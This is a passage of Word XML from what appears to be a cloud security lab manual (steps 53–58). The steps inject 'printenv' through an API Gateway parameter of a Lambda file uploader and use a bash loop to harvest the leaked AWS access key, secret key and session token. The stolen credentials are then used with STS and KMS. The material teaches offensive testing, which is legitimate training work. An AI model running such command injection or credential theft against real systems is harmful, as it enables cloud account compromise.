    <w:p w14:paraId="088264C4" w14:textId="679AEFD8" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00D66075">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>Stage: ​default Resource: ​v1</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:br/>
        <w:t xml:space="preserve">Region:​ ap-southeast-1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D607957" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00D66075">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>Invocation URL: ​https://x5a88cfb22.execute-api.ap-southeast-1.amazonaws.com/default/v1 Method:​ GET</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:br/>
        <w:t>Parameter (Identified from the lambda function): ​</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>resourceUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">, username and password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1723E7" w14:textId="77777777" w:rsidR="00D66075" w:rsidRDefault="00D66075" w:rsidP="00D66075">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6C8AA2" w14:textId="77777777" w:rsidR="00D66075" w:rsidRDefault="0094232C" w:rsidP="00D66075">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Curl Command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B302873" w14:textId="6E393D85" w:rsidR="0018153B" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00D66075">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">​curl "https://x5a88cfb22.execute-api.ap-southeast-1.amazonaws.com/default/v1?resourceUrl=www. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>pentesteracademy.com;printenv&amp;username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>welcome&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">=welcome" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275CD28C" w14:textId="77777777" w:rsidR="0018153B" w:rsidRDefault="0018153B" w:rsidP="0018153B"/>
    <w:p w14:paraId="355ACC52" w14:textId="24FA09F5" w:rsidR="00D66075" w:rsidRDefault="0094232C" w:rsidP="0018153B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 53: ​Send the curl command and check the received response. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E4DB9" w14:textId="77777777" w:rsidR="00D66075" w:rsidRDefault="0094232C" w:rsidP="00D66075">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>Command: ​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EB2F7C" w14:textId="010F2014" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00D66075">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">curl "https://x5a88cfb22.execute-api.ap-southeast-1.amazonaws.com/default/v1?resourceUrl=www. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>pentesteracademy.com;printenv&amp;username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>welcome&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">=welcome" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44899FA2" w14:textId="504F46A6" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="6EBDDFCB" w14:textId="40675A11" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page46image66254240" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D8B5770" wp14:editId="4F602B57">
            <wp:extent cx="5731510" cy="819785"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="18415"/>
            <wp:docPr id="20" name="Picture 20" descr="page46image6625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age46image6625424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819785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F7044F" w14:textId="77777777" w:rsidR="001F3CA3" w:rsidRPr="0094232C" w:rsidRDefault="001F3CA3" w:rsidP="0094232C"/>
    <w:p w14:paraId="053F55B4" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 54: ​Write a wrapper script to send multiple curl requests and look for responses which deviate from the previous response. If the command injection attack is successful, version 1 of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> Function will return more data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125FE30" w14:textId="77777777" w:rsidR="00F9324D" w:rsidRDefault="00F9324D" w:rsidP="0094232C"/>
    <w:p w14:paraId="184C04BD" w14:textId="5F41FA23" w:rsidR="00F706D5" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Note: ​The below-given script depends upon the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> package. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D23BE21" w14:textId="77777777" w:rsidR="00F9324D" w:rsidRDefault="00F9324D" w:rsidP="0094232C"/>
    <w:p w14:paraId="69C77DAE" w14:textId="250648CE" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0018153B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>Script:</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:br/>
        <w:t xml:space="preserve">#!/bin/bash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252D6B42" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0018153B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> in {1..100} do </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A787DCB" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0018153B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">output=$(curl 'https://x5a88cfb22.execute-api.ap-southeast-1.amazonaws.com/default/v1/?resourceurl=www.p entesteracademy.com%3Bprintenv&amp;username=welcome&amp;password=welcome' -s) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7EC523" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0018153B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">if [ $(echo $output | grep '{"Upload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>Status":"ok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">"}'| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>wc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> -l) -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>eq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> 0 ]; then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295DBB3D" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0018153B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">echo $output | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> '."File Content"' -r | grep AWS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE4DFBE" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0018153B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">break fi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6668218F" w14:textId="4CE0B827" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0018153B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">done </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640597B8" w14:textId="77777777" w:rsidR="00F706D5" w:rsidRPr="0094232C" w:rsidRDefault="00F706D5" w:rsidP="0094232C"/>
    <w:p w14:paraId="43DC6B3A" w14:textId="60A2415C" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page46image66247584" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65A65F18" wp14:editId="25A70A28">
            <wp:extent cx="5731510" cy="1544320"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="17780"/>
            <wp:docPr id="19" name="Picture 19" descr="page46image6624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age46image6624758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1544320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0A68B5" w14:textId="4BB261C1" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="7C5FE362" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">When the response does not contain the exact string "'{"Upload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>Status":"ok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">"}", use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>jq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> to extract the "File Content" value and filter the lines which contain "AWS" in it. The AWS Access Key, Secret Key and Session token environment variable will start with an "AWS" string. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2FBA80" w14:textId="77777777" w:rsidR="00F706D5" w:rsidRDefault="00F706D5" w:rsidP="0094232C"/>
    <w:p w14:paraId="05A31BB8" w14:textId="375E7EB5" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0018153B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 55:​ Make the script executable and execute it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F93C2AA" w14:textId="251284B0" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00F706D5">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Commands: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> +x attack.sh ./attack.sh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AAB69C" w14:textId="77777777" w:rsidR="00510C83" w:rsidRDefault="00510C83" w:rsidP="0094232C"/>
    <w:p w14:paraId="129FF982" w14:textId="2B032B8E" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page47image66258768" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7095ABF7" wp14:editId="107EDA62">
            <wp:extent cx="5731510" cy="2425065"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="13335"/>
            <wp:docPr id="16" name="Picture 16" descr="page47image6625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age47image6625876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a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4105D1" w14:textId="77777777" w:rsidR="00017AEE" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The AWS Access Key, Secret Key and Session Token were revealed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32165436" w14:textId="77777777" w:rsidR="00017AEE" w:rsidRDefault="00017AEE" w:rsidP="0094232C"/>
    <w:p w14:paraId="6C920271" w14:textId="07D84904" w:rsidR="00017AEE" w:rsidRDefault="0094232C" w:rsidP="0018153B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 56: ​Export the environment variables. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEADC1A" w14:textId="3A39F4A7" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page48image66266464" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62E64288" wp14:editId="4722DC36">
            <wp:extent cx="5731510" cy="1111885"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="18415"/>
            <wp:docPr id="13" name="Picture 13" descr="page48image6626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age48image6626646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1111885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6B834F" w14:textId="77777777" w:rsidR="00DC0D5C" w:rsidRPr="0094232C" w:rsidRDefault="00DC0D5C" w:rsidP="0094232C"/>
    <w:p w14:paraId="41AB20F9" w14:textId="5D1CBEAE" w:rsidR="0018153B" w:rsidRDefault="0094232C" w:rsidP="0018153B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 57: ​Check the IAM user or role whose credentials are used for the operation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0A84C5" w14:textId="523B2299" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0018153B">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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>sts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> get-caller-identity </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C8EFF9" w14:textId="68721AC6" w:rsidR="00DC0D5C" w:rsidRDefault="0094232C" w:rsidP="00DC0D5C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The credentials are of the role associated with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> Function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A18E2" w14:textId="77777777" w:rsidR="00DC0D5C" w:rsidRDefault="00DC0D5C" w:rsidP="00DC0D5C"/>
    <w:p w14:paraId="1ECCFE71" w14:textId="77777777" w:rsidR="00DC0D5C" w:rsidRDefault="0094232C" w:rsidP="0018153B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>Step 58: ​Use KMS to decrypt the cipher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019463AB" w14:textId="394A0A18" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00DC0D5C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: ​aws kms decrypt --ciphertext-blob fileb://cipherblob </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2404180C" w14:textId="77777777" w:rsidR="0018153B" w:rsidRDefault="0018153B" w:rsidP="0094232C"/>
    <w:p w14:paraId="5052E3B3" w14:textId="77777777" w:rsidR="0018153B" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page48image66266880" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36934030" wp14:editId="5A3368DC">
            <wp:extent cx="5731510" cy="904240"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="10160"/>
            <wp:docPr id="12" name="Picture 12" descr="page48image6626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age48image6626688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904240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0CBED5" w14:textId="77777777" w:rsidR="0018153B" w:rsidRDefault="0018153B" w:rsidP="0094232C"/>
    <w:p w14:paraId="34C05264" w14:textId="16F62C43" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page48image66267712" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A1230AD" wp14:editId="2A26EF67">
            <wp:extent cx="5731510" cy="876935"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="12065"/>
            <wp:docPr id="11" name="Picture 11" descr="page48image6626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age48image6626771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1510" cy="876935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
